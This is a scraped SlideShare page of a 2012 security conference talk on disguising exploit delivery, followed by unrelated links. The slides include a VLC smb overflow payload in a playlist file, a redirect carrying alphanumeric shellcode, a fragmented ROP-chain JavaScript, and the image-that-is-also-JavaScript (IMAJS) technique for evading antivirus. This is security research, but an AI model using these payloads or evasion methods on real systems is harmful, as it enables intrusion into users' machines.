When Bad Things Come In Good Packages

50 %
50 %
Information about When Bad Things Come In Good Packages
Technology

Published on November 29, 2012

Author: saumilshah

Source: slideshare.net

Description

My DEEPSEC 2012 talk explores the fine art of packaging when it comes to exploits. No this is not another talk about packers or crypters. We are talking STYLE! A successful exploit is one that is innovatively delivered, in style. We shall be talking about a number of sneaky, funny and innovative techniques for delivering exploits to their doorsteps without annoyances like anti-virus or content filtering getting in the way.

This talk goes beyond the obvious obfuscation. We combine the power of web hacking, the power of sophisticated exploit development and goofball creativity to ensure that exploits get delivered and detonate on time, as planned. Did you know you can literally paint an exploit on canvas? Have you heard of chameleon Javascript? This and more in the talk!

when Bad Things come in Good packages Saumil Shahnet-square DEEPSEC 2012

# who am iSaumil Shah, CEO Net-Square.•  Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.•  M.S. Computer Science Purdue University.•  saumil@net-square.com•  LinkedIn: saumilshah•  Twitter: @therealsaumilnet-square

My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference Conference "Eyes and Speaker Trainer ears open"net-square

When two forces combine... Web Binary Hacking Exploitsnet-square

SNEAKY LETHALnet-square

net-square

302 IMG JS HTML5net-square

net-square

VLC smb overflow•  smb://example.com@0.0.0.0/foo/ #{AAAAAAAA....}•  Classic Stack Overflow.net-square

VLC XSPF file<?xml version="1.0" encoding="UTF-8"?>!<playlist version="1"! xmlns="http://xspf.org/ns/0/"! xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">! <title>Playlist</title>! <trackList>! <track>! <location>! smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}! </location>! <extension! application="http://www.videolan.org/vlc/playlist/0">! <vlc:id>0</vlc:id>! </extension>! </track>! </trackList>!</playlist>! net-square

Alpha Encoded Tiny ZOMFG! Exploit URLnet-square

100% Pure Alphanum!net-square

VLC smb overflow - HTMLized!! "<embed type="application/x-vlc-plugin"! " "width="320" height="200"! " "target="http://tinyurl.com/ycctrzf"! " "id="vlc" />!net-square

301 Redirect from tinyurlHTTP/1.1 301 Moved Permanently!X-Powered-By: PHP/5.2.12!Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1!JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII!IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL!KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk!PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH!kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn!CUCHPeEPAA}!Content-type: text/html!Content-Length: 0!Connection: close!Server: TinyURL/1.6! net-square

net-square

Exploits as Images - 1•  Grayscale encoding (0-255).•  1 pixel = 1 character.•  Perfectly valid image.•  Decode and Execute!net-square

net-square

Im an evil Javascript Im an innocent imagenet-square

function packv(n) {var s=new Number(n).toStri ng(16);while(s.l return(unescape( ength<8)s="0"+s; "%u"+s.substring string(0,4)))}va (4,8)+"%u"+s.sub r addressof=new Array();addresso f["ropnop"]=0x6d ["xchg_eax_esp_r 81bdf0;addressof et"]=0x6d81bdef; ax_ret"]=0x6d906 addressof["pop_e 744;addressof["p d81cd57;addresso op_ecx_ret"]=0x6 f["mov_peax_ecx_ ;addressof["mov_ ret"]=0x6d979720 eax_pecx_ret"]=0 sof["mov_pecx_ea x6d8d7be0;addres x_ret"]=0x6d8eee c_eax_ret"]=0x6d 01;addressof["in 838f54;addressof ]=0x00000000;add ["add_eax_4_ret" ressof["call_pea 31;addressof["ad x_ret"]=0x6d8aec d_esp_24_ret"]=0 sof["popad_ret"] x00000000;addres =0x6d82a8a1;addr "]=0x6d802597;fu essof["call_peax nction call_ntallocatev irtualmemory(bas m){var ropnop=pac eptr,size,callnu kv(addressof["ro pop_eax_ret=pack pnop"]);var v(addressof["pop pop_ecx_ret=pack _eax_ret"]);var v(addressof["pop mov_peax_ecx_ret _ecx_ret"]);var =packv(addressof et"]);var ["mov_peax_ecx_r mov_eax_pecx_ret =packv(addressof et"]);var ["mov_eax_pecx_r mov_pecx_eax_ret =packv(addressof et"]);var ["mov_pecx_eax_r call_peax_ret=pa ckv(addressof["c var all_peax_ret"]); add_esp_24_ret=p ackv(addressof[" );var add_esp_24_ret"] popad_ret=packv( addressof["popad retval=""! _ret"]);var <CANVAS>net-square

net-square See no eval()

Same Same No Different! var a = eval(str); a = (new Function(str))();net-square

IMAJSnet-square I iz being a Javascript

IMAJS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script>net-square

IMAJS-GIF Browser SupportHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera ? ?2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -net-square

IMAJS-BMP Browser SupportHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -net-square

The αq Exploitnet-square

Demo IMAJS αq FTW!net-square

Alpha encoded exploit code IMAJS CANVAS "loader" scriptnet-square

These are not the sploitsyoure looking for net-square

No virus threat detectednet-square

The FUTURE?net-square

when Bad Things come inGood packagesTHE END@therealsaumilsaumil@net-square.com net-square

Add a comment

Related presentations

Related pages

Blood Journal | Bad (or good) things come in small packages

Bad (or good) things come in small packages. Lubica Rauova 1, 2 and ; Douglas B. Cines 1; 1 UNIVERSITY OF PENNSYLVANIA; 2 THE CHILDREN’S HOSPITAL OF ...
Read more

Bad Things Come in Good Packages – hangryme

Bad Things Come in Good Packages. June 20, 2016 June 22, 2016. ... Tagged: bad luck, car accident, father's day, hangry, hangry me, matcha, me ...
Read more

NASA - Good Things Come in Small Packages

Good Things Come in Small Packages. ... The project to use handheld computers in the classroom is the latest and greatest idea to come from Salonich and ...
Read more

Bad (or good) things come in small packages - bloodjournal.org

lllTHROMBOSIS & HEMOSTASIS Comment on Betapudi et al, page 3808 Bad (or good) things come in small packages ...
Read more

Good Things Come In Small Packages Dont Miss It

good things come in small packages dont miss it is available in our digital library an online access ... [PDF] Burn Notice The Bad Beat [PDF] ...
Read more

Good Things Come In Small Packages - ires.j-kobo.com

Download and Read Good Things Come In Small Packages Good Things Come In Small Packages ... good kids who do bad things how to help your kids make good ...
Read more

Good Things Of Life - mechanic.ditchyourip.com

good things come in small packages PDF ... good kids who do bad things how to help your kids make good choices PDF good things come in small packages dont ...
Read more

Good Things Come In Small Packages - Modern - Haus ...

Bad; Schlafzimmer; Wohnzimmer; Esszimmer; Baby & Kind; Arbeitszimmer; Flur; Ankleidezimmer; Eingang; Outdoor; Haus & Fassade; Keller; Pool; Garage ...
Read more

Bad Things Come in Small Packages | Dr. William Davis

Bad Things Come in Small Packages. By Dr. Davis ... and genetically manipulate such things, ... Cardiologist Dr. William Davis is a New York
Read more